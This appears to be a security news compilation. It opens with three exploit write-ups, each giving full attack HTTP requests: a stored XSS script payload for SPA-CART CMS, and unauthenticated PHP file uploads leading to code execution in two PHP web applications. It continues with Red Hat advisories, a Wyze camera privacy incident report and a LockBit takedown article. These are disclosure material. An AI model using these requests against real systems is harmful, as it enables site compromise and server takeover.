SPA-CART CMS version 1.9.0.3 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: SPA-CART CMS - Stored XSS  
# Date: 2024-01-03  
# Exploit Author: Eren Sen  
# Vendor: SPA-Cart  
# Vendor Homepage: https://spa-cart.com/  
# Software Link: https://demo.spa-cart.com/  
# Version: [1.9.0.3]  
# CVE-ID: N/A  
# Tested on: Kali Linux / Windows 10  
# Vulnerabilities Discovered Date : 2024/01/03

# Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability  
# Vulnerable Parameter Type: POST  
# Vulnerable Parameter: descr

# Proof of Concept: demo.spa-cart.com/product/258

# HTTP Request:

POST ////admin/products/258 HTTP/2  
Host: demo.spa-cart.com  
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx  
Content-Length: 1906  
Sec-Ch-Ua:  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36  
Sec-Ch-Ua-Platform: ""  
Origin: https://demo.spa-cart.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.spa-cart.com////admin/products/258  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="mode"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="sku"

SKU386

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="name"

asdf

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="cleanurl"

Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads  
------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="avail"

1000

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="price"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="list_price"

2

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="weight"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categoryid"

42

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

8

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

37

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="brandid"

4

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="status"

1

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl

Content-Disposition: form-data; name="descr"

<script>alert(1)</script>

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="title_tag"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl--

SPA-CART CMS 1.9.0.3 Cross Site Scripting

Petrol Pump Management Software version 1.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Petrol pump management software - File Upload Remote Code Execution (RCE) (unauthenticated)  
# Google Dork: N/A  
# Application: Petrol pump management software  
# Date: 20.02.2024  
# Bugs: File Upload Remote Code Execution (RCE) (unauthenticated)  
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html  
# Version: 1.0  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

Due to a security vulnerability in "fuelflow/admin/app/web_crud.php," unauthorized users can upload   
files using the "POST" method. The uploaded files are stored in the "/fuelflow/assets/images" folder.   
This allows malicious individuals to execute unauthorized commands on the system.

## Staus: HIGH-CRITICAL Vulnerability

## Proof of Concept (PoC):

Video:  
https://drive.google.com/file/d/1_jue-UhpASC_XxcUWU-QhMYDrSIehnWx/view

// File upload Request

POST /zerday/fuelflow/admin/app/web_crud.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: multipart/form-data; boundary=---------------------------82750242321210078514140255085  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/zer/fuelflow/admin/web.php  
Cookie: PHPSESSID=1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1

-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="id"

1  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="old_photo1_img"

test.png  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="photo1"; filename="3.php"  
Content-Type: image/png

<?php phpinfo();?>  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="title"

FuelFlow lite - Developed by Mayuri K. tessss  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="old_photos_img"

test.png  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="photos"; filename=""  
Content-Type: application/octet-stream

-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="sitekey"

test  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="secretkey"

test  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="update"

-----------------------------82750242321210078514140255085--

//  Phpinfo file locaton 

/zerday/fuelflow/assets/images/65d45a6080eca.php

Petrol Pump Management Software 1.0 Shell Upload

Tourism Management System version 2.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload# Google Dork: N/A# Exploit Author: SoSPiro# Date: 2024-02-18# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/tourism-management-system-free-download/# Version: 2.0# Tested on: Windows 10 Pro# Impact: Allows admin to upload all files to the web server# CVE : N/A# Exploit Description:The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input.# PoC requestPOST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201Content-Length: 361Origin: http://localhostConnection: closeReferer: http://localhost/zer/tms/admin/change-image.php?imgid=1Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhvUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1X-PwnFox-Color: red-----------------------------390927495111779706051786831201Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php"Content-Type: text/plain<?php phpinfo();?>-----------------------------390927495111779706051786831201Content-Disposition: form-data; name="submit"-----------------------------390927495111779706051786831201--===========================================================================================- Response -HTTP/1.1 200 OKDate: Sun, 18 Feb 2024 04:33:37 GMTServer: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-devX-Powered-By: PHP/8.1.13Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 8146============================================================================================- File location -http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php

Tourism Management System 2.0 Shell Upload

Red Hat Security Advisory 2024-0903-03 - Red Hat AMQ Broker 7.10.6 is now available from the Red Hat Customer Portal. Issues addressed include a bypass vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0903.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat AMQ Broker 7.10.6 release and security updateAdvisory ID:        RHSA-2024:0903-03Product:            Red Hat JBoss AMQAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0903Issue date:         2024-02-20Revision:           03CVE Names:          CVE-2023-44981====================================================================Summary: Red Hat AMQ Broker 7.10.6 is now available from the Red Hat Customer Portal.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms.This release of Red Hat AMQ Broker 7.10.6 includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.Security Fix(es):* (CVE-2023-44981) zookeeper: Authorization Bypass in Apache ZooKeeperFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-44981References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.broker&version=7.10.6https://access.redhat.com/documentation/en-us/red_hat_amq_broker/7.10https://bugzilla.redhat.com/show_bug.cgi?id=2243436

Red Hat Security Advisory 2024-0903-03

Red Hat Security Advisory 2024-0894-03 - An update for the mysql:8.0 module is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0894.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: mysql:8.0 security updateAdvisory ID:        RHSA-2024:0894-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0894Issue date:         2024-02-20Revision:           03CVE Names:          CVE-2022-4899====================================================================Summary: An update for the mysql:8.0 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries.Security Fix(es):* mysql: InnoDB unspecified vulnerability (CPU Apr 2023) (CVE-2023-21911)* mysql: Server: DDL unspecified vulnerability (CPU Apr 2023) (CVE-2023-21919, CVE-2023-21929, CVE-2023-21933)* mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2023) (CVE-2023-21920, CVE-2023-21935, CVE-2023-21945, CVE-2023-21946, CVE-2023-21976, CVE-2023-21977, CVE-2023-21982)* mysql: Server: Components Services unspecified vulnerability (CPU Apr 2023) (CVE-2023-21940, CVE-2023-21947, CVE-2023-21962)* mysql: Server: Partition unspecified vulnerability (CPU Apr 2023) (CVE-2023-21953, CVE-2023-21955)* mysql: Server: JSON unspecified vulnerability (CPU Apr 2023) (CVE-2023-21966)* mysql: Server: DML unspecified vulnerability (CPU Apr 2023) (CVE-2023-21972)* mysql: Client programs unspecified vulnerability (CPU Apr 2023) (CVE-2023-21980)* mysql: Server: Replication unspecified vulnerability (CPU Jul 2023) (CVE-2023-22005, CVE-2023-22007, CVE-2023-22057)* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22008)* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2023) (CVE-2023-22032, CVE-2023-22059, CVE-2023-22064, CVE-2023-22065, CVE-2023-22070, CVE-2023-22078, CVE-2023-22079, CVE-2023-22092, CVE-2023-22103, CVE-2023-22110, CVE-2023-22112)* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22033)* mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2023) (CVE-2023-22046, CVE-2023-22054, CVE-2023-22056)* mysql: Client programs unspecified vulnerability (CPU Jul 2023) (CVE-2023-22053)* mysql: Server: DDL unspecified vulnerability (CPU Jul 2023) (CVE-2023-22058)* mysql: InnoDB unspecified vulnerability (CPU Oct 2023) (CVE-2023-22066, CVE-2023-22068, CVE-2023-22084, CVE-2023-22097, CVE-2023-22104, CVE-2023-22114)* mysql: Server: UDF unspecified vulnerability (CPU Oct 2023) (CVE-2023-22111)* mysql: Server: DML unspecified vulnerability (CPU Oct 2023) (CVE-2023-22115)* mysql: Server: RAPID unspecified vulnerability (CPU Jan 2024) (CVE-2024-20960)* mysql: Server: Security: Encryption unspecified vulnerability (CPU Jan 2024) (CVE-2024-20963)* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jan 2024) (CVE-2024-20964)* mysql: Server: Replication unspecified vulnerability (CPU Jan 2024) (CVE-2024-20967)* mysql: Server: Options unspecified vulnerability (CPU Jan 2024) (CVE-2024-20968)* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20969)* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2024) (CVE-2024-20961, CVE-2024-20962, CVE-2024-20965, CVE-2024-20966, CVE-2024-20970, CVE-2024-20971, CVE-2024-20972, CVE-2024-20973, CVE-2024-20974, CVE-2024-20976, CVE-2024-20977, CVE-2024-20978, CVE-2024-20982)* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20981)* mysql: Server: DML unspecified vulnerability (CPU Jan 2024) (CVE-2024-20983)* mysql: Server : Security : Firewall unspecified vulnerability (CPU Jan 2024) (CVE-2024-20984)* mysql: Server: UDF unspecified vulnerability (CPU Jan 2024) (CVE-2024-20985)* zstd: mysql: buffer overrun in util.c (CVE-2022-4899)* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jul 2023) (CVE-2023-22038)* mysql: Server: Pluggable Auth unspecified vulnerability (CPU Jul 2023) (CVE-2023-22048)* mysql: Server: Security: Encryption unspecified vulnerability (CPU Oct 2023) (CVE-2023-22113)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* Fix for MySQL bug #33630199 in 8.0.32 introduces regression when --set-gtid-purged=OFF (RHEL-22452)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-4899References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2179864https://bugzilla.redhat.com/show_bug.cgi?id=2188109https://bugzilla.redhat.com/show_bug.cgi?id=2188113https://bugzilla.redhat.com/show_bug.cgi?id=2188115https://bugzilla.redhat.com/show_bug.cgi?id=2188116https://bugzilla.redhat.com/show_bug.cgi?id=2188117https://bugzilla.redhat.com/show_bug.cgi?id=2188118https://bugzilla.redhat.com/show_bug.cgi?id=2188119https://bugzilla.redhat.com/show_bug.cgi?id=2188120https://bugzilla.redhat.com/show_bug.cgi?id=2188121https://bugzilla.redhat.com/show_bug.cgi?id=2188122https://bugzilla.redhat.com/show_bug.cgi?id=2188123https://bugzilla.redhat.com/show_bug.cgi?id=2188124https://bugzilla.redhat.com/show_bug.cgi?id=2188125https://bugzilla.redhat.com/show_bug.cgi?id=2188127https://bugzilla.redhat.com/show_bug.cgi?id=2188128https://bugzilla.redhat.com/show_bug.cgi?id=2188129https://bugzilla.redhat.com/show_bug.cgi?id=2188130https://bugzilla.redhat.com/show_bug.cgi?id=2188131https://bugzilla.redhat.com/show_bug.cgi?id=2188132https://bugzilla.redhat.com/show_bug.cgi?id=2224211https://bugzilla.redhat.com/show_bug.cgi?id=2224212https://bugzilla.redhat.com/show_bug.cgi?id=2224213https://bugzilla.redhat.com/show_bug.cgi?id=2224214https://bugzilla.redhat.com/show_bug.cgi?id=2224215https://bugzilla.redhat.com/show_bug.cgi?id=2224216https://bugzilla.redhat.com/show_bug.cgi?id=2224217https://bugzilla.redhat.com/show_bug.cgi?id=2224218https://bugzilla.redhat.com/show_bug.cgi?id=2224219https://bugzilla.redhat.com/show_bug.cgi?id=2224220https://bugzilla.redhat.com/show_bug.cgi?id=2224221https://bugzilla.redhat.com/show_bug.cgi?id=2224222https://bugzilla.redhat.com/show_bug.cgi?id=2245014https://bugzilla.redhat.com/show_bug.cgi?id=2245015https://bugzilla.redhat.com/show_bug.cgi?id=2245016https://bugzilla.redhat.com/show_bug.cgi?id=2245017https://bugzilla.redhat.com/show_bug.cgi?id=2245018https://bugzilla.redhat.com/show_bug.cgi?id=2245019https://bugzilla.redhat.com/show_bug.cgi?id=2245020https://bugzilla.redhat.com/show_bug.cgi?id=2245021https://bugzilla.redhat.com/show_bug.cgi?id=2245022https://bugzilla.redhat.com/show_bug.cgi?id=2245023https://bugzilla.redhat.com/show_bug.cgi?id=2245024https://bugzilla.redhat.com/show_bug.cgi?id=2245026https://bugzilla.redhat.com/show_bug.cgi?id=2245027https://bugzilla.redhat.com/show_bug.cgi?id=2245028https://bugzilla.redhat.com/show_bug.cgi?id=2245029https://bugzilla.redhat.com/show_bug.cgi?id=2245030https://bugzilla.redhat.com/show_bug.cgi?id=2245031https://bugzilla.redhat.com/show_bug.cgi?id=2245032https://bugzilla.redhat.com/show_bug.cgi?id=2245033https://bugzilla.redhat.com/show_bug.cgi?id=2245034https://bugzilla.redhat.com/show_bug.cgi?id=2258771https://bugzilla.redhat.com/show_bug.cgi?id=2258772https://bugzilla.redhat.com/show_bug.cgi?id=2258773https://bugzilla.redhat.com/show_bug.cgi?id=2258774https://bugzilla.redhat.com/show_bug.cgi?id=2258775https://bugzilla.redhat.com/show_bug.cgi?id=2258776https://bugzilla.redhat.com/show_bug.cgi?id=2258777https://bugzilla.redhat.com/show_bug.cgi?id=2258778https://bugzilla.redhat.com/show_bug.cgi?id=2258779https://bugzilla.redhat.com/show_bug.cgi?id=2258780https://bugzilla.redhat.com/show_bug.cgi?id=2258781https://bugzilla.redhat.com/show_bug.cgi?id=2258782https://bugzilla.redhat.com/show_bug.cgi?id=2258783https://bugzilla.redhat.com/show_bug.cgi?id=2258784https://bugzilla.redhat.com/show_bug.cgi?id=2258785https://bugzilla.redhat.com/show_bug.cgi?id=2258787https://bugzilla.redhat.com/show_bug.cgi?id=2258788https://bugzilla.redhat.com/show_bug.cgi?id=2258789https://bugzilla.redhat.com/show_bug.cgi?id=2258790https://bugzilla.redhat.com/show_bug.cgi?id=2258791https://bugzilla.redhat.com/show_bug.cgi?id=2258792https://bugzilla.redhat.com/show_bug.cgi?id=2258793https://bugzilla.redhat.com/show_bug.cgi?id=2258794

Red Hat Security Advisory 2024-0894-03

Red Hat Security Advisory 2024-0879-03 - An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 7 Supplementary. Issues addressed include denial of service and deserialization vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0879.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: java-1.8.0-ibm security update  
Advisory ID:        RHSA-2024:0879-03  
Product:            Red Hat Enterprise Linux Supplementary  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0879  
Issue date:         2024-02-20  
Revision:           03  
CVE Names:          CVE-2023-5676  
====================================================================

Summary: 

An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 7 Supplementary.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.

This update upgrades IBM Java SE 8 to version 8 SR8-FP15.

Security Fix(es):

* IBM JDK: Eclipse OpenJ9 JVM denial of service (CVE-2023-5676)

* OpenJDK: IOR deserialization issue in CORBA (8303384) (CVE-2023-22067)

* OpenJDK: certificate path validation issue during client authentication (8309966) (CVE-2023-22081)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5676

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2243627  
https://bugzilla.redhat.com/show_bug.cgi?id=2243637  
https://bugzilla.redhat.com/show_bug.cgi?id=2250255

Red Hat Security Advisory 2024-0879-03

Red Hat Security Advisory 2024-0866-03 - An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 8. Issues addressed include denial of service and deserialization vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0866.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: java-1.8.0-ibm security update  
Advisory ID:        RHSA-2024:0866-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0866  
Issue date:         2024-02-19  
Revision:           03  
CVE Names:          CVE-2023-5676  
====================================================================

Summary: 

An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.

This update upgrades IBM Java SE 8 to version 8 SR8-FP15.

Security Fix(es):

* IBM JDK: Eclipse OpenJ9 JVM denial of service (CVE-2023-5676)

* OpenJDK: IOR deserialization issue in CORBA (8303384) (CVE-2023-22067)

* OpenJDK: certificate path validation issue during client authentication (8309966) (CVE-2023-22081)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5676

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2243627  
https://bugzilla.redhat.com/show_bug.cgi?id=2243637  
https://bugzilla.redhat.com/show_bug.cgi?id=2250255

Red Hat Security Advisory 2024-0866-03

Wyze cameras allowed users access to other users' feeds once again. An estimated 13,000 people got a peek at thumbnails from another user’s home.

Last September, we wrote an article about how Wyze home cameras temporarily showed other people’s security feeds.

As far as home cameras go, we said this is absolutely up there at the top of the “things you don’t want to happen” list. Turning your customers into Peeping Tom against their will and exposing other customers’ footage is definitely not OK.

It’s not OK, but yet here we are again. On February 17, TheVerge reported that history had repeated itself. Wyze co-founder David Crosby confirmed that users were able to briefly see into a stranger’s property because they were shown an image from someone else’s camera.

Crosby told The Verge:

> “We have now identified a security issue where some users were able to see thumbnails of cameras that were not their own in the Events tab.”

So, it’s not a full feed and just a thumbnail, you might think. Is that such a big deal? Well, it was a bit more than that. Users got notification alerts for events in their house. I don’t know how you feel when you get one of those while you know there shouldn’t be anyone there, but it’s enough to make me nervous.

Imagine your surprise when you then see someone else’s house as the cause for that notification.

Wyze blames the issue on overload and corruption of user data after an AWS outage. However, AWS did not report an outage during the time Wyze cameras were having these problems.

And, while the company originally said it had identified 14 instances of the security issue, the number of complaints on Reddit and the Wyze forums indicated that there must have been a lot more.

This turned out to be the case. In an email sent to customers, Wyze revealed that it was actually around 13,000 people who got an unauthorized peek at thumbnails from other people’s homes.

Wyze chalks up the incident to a recently-integrated third-party caching client library which caused the issue when they brought back cameras online after an outage at AWS.

> “This client library received unprecedented load conditions caused by devices coming back online all at once. As a result of increased demand, it mixed up device ID and user ID mapping and connected some data to incorrect accounts.”

Wyze says it has added an extra layer of verification before users can view Event videos.

So, all we can do is hope we don’t have to write another story like this one in a few months.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Wyze cameras show the wrong feeds to customers. Again. 

By Waqas
To date, the LockBit ransomware gang targeted over 2,000 victims and received more than $120 million in ransom payments.
This is a post from HackRead.com Read the original post: NCA’s LockBit Takedown: Source Code, Arrests and Recovery Tool Revealed

Discover the Complete Story Behind the Collapse of the LockBit Ransomware Gang – From Infrastructure Seizures and Freezing Cryptocurrency Accounts to European Arrests, Charges, Indictments, and the Release of a Recovery Tool by Authorities.

In a groundbreaking operation, the United Kingdom’s National Crime Agency (NCA) has dismantled the notorious LockBit ransomware, one of the world’s most prolific ransomware groups – The takedown was part of “Operation Cronos.”

On 19 February 2024, Hackread.com’s in-depth report revealed that all dark web domains of LockBit ransomware had been seized. Now, according to the NCA’s press release, the latest development in this ongoing saga sees the agency taking control of LockBit’s primary administration environment, effectively cutting off the group’s ability to carry out further attacks.

Additionally, the agency has seized control of LockBit’s public-facing leak site on the dark web, repurposing it to expose the group’s tactics and operations.

****LockBit Source Code and Backend****

Crucially, the NCA has obtained the source code of the LockBit platform and a wealth of intelligence on the group’s activities and affiliates. This trove of information not only sheds light on LockBit’s modus operandi but also provides insight into the individuals and organizations complicit in their criminal enterprises.

One noteworthy disclosure from the NCA’s investigation is the discovery that some of the data on LockBit’s systems belonged to victims who had already paid ransom demands. This highlights the harsh reality that even compliance with ransom demands does not guarantee the safe return of stolen data—a fact often glossed over by cybercriminals.

LockBit ransomware’s dark web domains are now being used to expose the gang’s modus operandi (Screenshot credit: Hackread.com)

****Arrests and Indictments****

The crackdown on LockBit extends beyond digital infiltration, with law enforcement agencies in multiple countries executing arrests and freezing cryptocurrency accounts linked to the group.

In a coordinated effort led by Europol, two LockBit actors from Poland and Ukraine have been apprehended, while the US Department of Justice has brought criminal charges against two Russian nationals Artur Sungatov and Ivan Kondratyev, alias Bassterlord, for deploying LockBit against multiple victims across the United States.

These victims include businesses spanning various industries nationwide, such as manufacturing, alongside global victims in sectors like semiconductors.

It is worth noting that in June 2023, Ruslan Magomedovich Astamirov (20), a Russian national, was also arrested and charged with conspiring to commit LockBit ransomware attacks against U.S. and foreign businesses. To date, the LockBit ransomware gang targeted over 2,000 victims and received more than $120 million in ransom payments.

****A platform for LockBit victims****

It is also crucial to mention that the FBI has established an online platform for victims of LockBit ransomware. This platform caters to both U.S. victims and non-U.S. victims interested in engaging with the U.S. LockBit prosecutions. Whether it’s to submit a victim-impact statement or to claim restitution, individuals can access the platform here: Lockbitvictims.ic3.gov.

This is what the LockBit ransomware’s dark web domains look like (Screenshot credit: Hackread.com)

****Japanese LockBit Recovery Tool****

The Japanese Police, with support from Europol, has developed a specialized recovery tool aimed at restoring files encrypted by the LockBit 3.0 Black Ransomware. To utilize this recovery solution effectively, users are instructed to execute the provided binary file on their affected machines, initiating an initial assessment process.

The tool will be available on the No More Ransomware platform soon. Alternatively, if you are a victim and based in the United Kingdom send an email to the NCA at \[email protected\]. Those in the United States can visit Lockbitvictims.ic3.gov.

The NCA’s Director General, Graeme Biggar, hailed the operation as a testament to the agency’s relentless pursuit of cybercriminals, emphasizing that no criminal enterprise is beyond its reach. Home Secretary James Cleverly echoed this sentiment, commending the NCA for disrupting LockBit’s operations and signalling the UK’s unwavering commitment to combatting cyber threats.

US Attorney General Merrick B. Garland emphasized the collaborative nature of the operation, highlighting the partnership between US and UK law enforcement agencies in dismantling LockBit’s criminal infrastructure. FBI Director Christopher A. Wray echoed these sentiments, underscoring the bureau’s dedication to defending against cyber threats and holding perpetrators accountable.

****Reaction from Experts****

For insights into the latest development, we reached out to Ryan McConechy, CTO of Barrier Networks, who expressed appreciation for law enforcement’s role in combating cybercrime, particularly the escalating threat of ransomware.

_“_These actions demonstrate the efforts law enforcement is placing on fighting ransomware, but the seizure of LockBit’s servers is undoubtedly one of the biggest accomplishments so far._”_

Ryan warned that seizing infrastructure and arrests does not mean the gang can not return. However, strengthening your cybersecurity measures can defend businesses against such threats.

_“_Organisations must act before it is too late,” he emphasised. _“_This involves training on threats, implementing MFA to secure employee credentials, keeping systems up to date with patches, and getting a well-oiled and comprehensive incident response plan in place, so everyone can step straight into effective action, even when attacks do occur,” Ryan advised.

As the dust settles on this major takedown, the NCA and its international partners stand ready to assist LockBit victims in recovering encrypted data and pursuing justice. With LockBit now effectively locked out, the NCA remains alert, knowing that the group may attempt to regroup and rebuild its criminal empire.

